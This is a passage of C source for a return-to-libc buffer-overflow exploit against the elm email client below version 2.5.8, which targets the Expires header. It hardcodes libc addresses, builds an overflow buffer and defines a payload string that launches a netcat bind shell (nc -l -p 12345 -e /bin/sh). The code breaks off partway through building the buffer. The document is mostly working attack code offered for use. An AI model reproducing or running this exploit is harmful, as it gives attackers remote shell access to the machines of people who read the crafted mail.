1 /*
2
3 Exploit code for the bug posted by Ulf Harnhammar (metaurtelia.com)
4 http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0688.html
5
6 Probably you will need to change SYSLOC and STRLOC to work on your box
7
8 */
9
10
11 #include <stdio.h>
12 #include <stdlib.h>
13 #include <string.h>
14 #include <unistd.h>
15
16 #define BUFFER 83
17 #define EMAIL "tmpmail"
18 #define STRING "‘nc −l −p 12345 −e /bin/sh‘&##"
19 #define SYSLOC 0x42041e50
20 #define STRLOC 0x4001a207
21 #define EXTLOC 0x4202b0f0
22
/* The literal bytes "Expires: " (the original spelled them as hex escapes):
 * the mail header name that main() copies to the front of its buffer. */
char expire[] = "Expires: ";
24
25 int main(int argc, char **argv)
26 {
27 char buffer[BUFFER];
28 char *email = NULL;
29 char *user = NULL;
30 int i;
31 long extloc, sysloc, strloc;
32 FILE *fp;
33
34 if(argc != 2) {
35 puts("Usage: ./elmex <user@where.com>");
36 exit(EXIT_FAILURE);
37 }
38
39 if(strlen(argv[1]) > 50) {
40 puts("[−] Sorry, email address too long!");
41 exit(EXIT_FAILURE);
42 }
43
44 user = (char *)malloc(strlen(argv[1]));
45 if(!user) {
46 perror("malloc");
47 exit(EXIT_FAILURE);
48 }
49
50 email = EMAIL;
51
52 memset(user, ’\0’, strlen(argv[1]));
53 memcpy(user, argv[1], strlen(argv[1]));
54
55 puts("\nExploit for elm email client < 2.5.8 overflow in Expires field");
56 puts("Tested: Redhat on quiet a Sunday by c0ntex[at]open−security.org\n");
57
58 extloc = EXTLOC;
59 sysloc = SYSLOC;
60 strloc = STRLOC;
61
62 memset(buffer, ’\0’, BUFFER);
63 memcpy(buffer, expire, strlen(expire));
64
65 for(i = strlen(expire); i < 53; i++)
66 *(buffer+i) = 0x41;
67 for(i = 53; i < 57; i += 4)
68 *(long *)&buffer[i] = sysloc;
69 for(i = 57; i < 61; i++)
70 *(long *)&buffer[i] = extloc;
71 for(i = 61; i < 65; i +=